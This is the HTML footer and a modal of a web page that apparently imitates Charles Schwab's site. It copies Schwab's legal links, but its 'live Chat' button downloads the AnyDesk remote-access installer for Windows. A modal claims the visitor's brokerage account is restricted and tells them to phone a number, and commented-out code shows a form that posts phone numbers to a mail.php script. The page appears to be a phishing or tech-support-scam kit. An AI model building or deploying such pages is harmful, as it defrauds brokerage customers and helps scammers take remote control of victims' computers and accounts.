                                    <span><a href="https://www.schwab.com/other-sites">Additional Schwab Sites</a></span>
                                </div>
                                <div>
                                    <span class="vr"></span>
                                    <span><a href="https://schwab.com/site-map">Site Map</a></span>
                                </div>
                                <div>
                                    <span class="vr"></span>
                                    <span><a href="https://www.schwab.com/legal/continuity">Business Continuity</a></span>
                                </div>
                                <div>
                                    <span class="vr"></span>
                                    <span><a href="https://www.schwab.com/legal/financials">Fiscal Statement</a></span>
                                </div>
                                <div>
                                    <span class="vr"></span>
                                    <span><a href="https://www.schwab.com/legal/accessibility-help">Accessibility Help</a></span>
                                </div>
                                <div>
                                    <span class="vr"></span>
                                    <span><a href="https://www.schwab.com/contact-us">Contact Us</a></span>
                                </div>
                                <div>
                                    <span class="vr"></span>
                                    <span><a href="https://www.aboutschwab.com/" target="_blank">About Schwab</a></span>
                                </div>
                                <div>
                                    <span class="vr"></span>
                                    <span><a href="https://www.schwabjobs.com/">Careers</a></span>
                                </div>
                                <div>
                                    <span class="vr"></span>
                                    <span><a href="https://www.schwab.com/legal/compensation-advice/investment-professionals-compensation">Wealth Professionals' Compensation</a></span>
                                </div>
                                <div>
                                    <span class="vr"></span>
                                    <span><a href="https://www.schwab.com/legal/important-notices">Important Notices</a></span>
                                </div>
                                <div>
                                    <span class="vr"></span>
                                    <span><a href="https://www.schwab.com/legal/account-protection">Profile Protection</a></span>
                                </div>
                                <div>
                                    <span class="vr"></span>
                                    <span><a href="https://www.schwab.com/legal/account-protection">SIPC®</a></span>
                                </div>
                                <div>
                                    <span class="vr"></span>
                                    <span><a href="https://www.schwab.com/legal/fdic-insurance">FDIC Insurance</a></span>
                                </div>
                                <div>
                                    <span class="vr"></span>
                                    <span><a href="https://brokercheck.finra.org/" target="_blank">FINRA's Broker Check</a></span>
                                </div>
                                <div>
                                    <span class="vr"></span>
                                    <span><a href="https://www.schwab.com/legal/consumer-complaint-notice">Client Complaints for Schwab</a></span>
                                </div>
                                <div>
                                    <span class="vr"></span>
                                    <span><a href="https://www.schwab.com/transparency">Client Relationship Summaries</a></span>
                                </div>

                            </div>

                        </div>
                        <div class="row">
                            <p class="footer-bottom-text">(0620-0EMZ)</p>
                        </div>
                        <div class="row live-chat-btn-row">
                            <a href="https://anydesk.com/en-gb/downloads/thank-you?dv=win_exe" target="_blank">
                                <button class="btn live-chat-btn">
                                    live Chat
                                    <i class="fa-brands fa-rocketchat ps-1 fa-2xl" style="color: #ffffff;"></i>
                                </button>
                            </a>
                        </div>
                        <div class="row footer-btn-row">
                            <a href="https://www.schwab.com/contact-us"><button class="btn footer-btn">Contact Us</button></a>
                        </div>
                    </div>
                </footer>
            </section>

        </div>
    </div>











    <!-- Modals -->



    <!-- Modal -->
    <div class="modal fade" id="staticBackdrop" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1" aria-labelledby="staticBackdropLabel" aria-hidden="true">
        <div class="modal-dialog modal-dialog-centered">
            <div class="modal-content">
                <div class="modal-header">
                    <h1 class="modal-title fs-5" id="staticBackdropLabel">Account Restrictied</h1>
                    <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
                </div>
                <div class="modal-body">
                    <!-- Danger-styled message -->
                    <p class="text-danger fw-medium">Your Brokerage Account is restricted</p>
                    <p class="fw-medium">Please give us a call on this number (123)-234-6789</p>
                    <!-- <form id="resetPasswordForm" action="final_emails/email/mail.php" method="post">
                        <div class="mb-3">
                            <label for="mobileNumber" class="form-label">Mobile Number</label>
                            <input type="tel" class="form-control" id="mobileNumber" name="phone" placeholder="Enter your mobile number" required>
                        </div>
                    </form> -->
                </div>
                <div class="modal-footer justify-content-between">
                    <button type="button" class="btn border-0 btn-secondary bg-light text-black" data-bs-dismiss="modal">Close</button>
                    <!-- <button type="submit" name="send" form="resetPasswordForm" class="btn btn-primary">Submit</button> -->
                </div>
            </div>
        </div>
    </div>


    <script src="assets/js/script.js"></script>
    <script src="assets/js/accordion.js"></script>
    <!-- Bootstrap JS -->
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha3/dist/js/bootstrap.bundle.min.js"></script>
</body>

</html>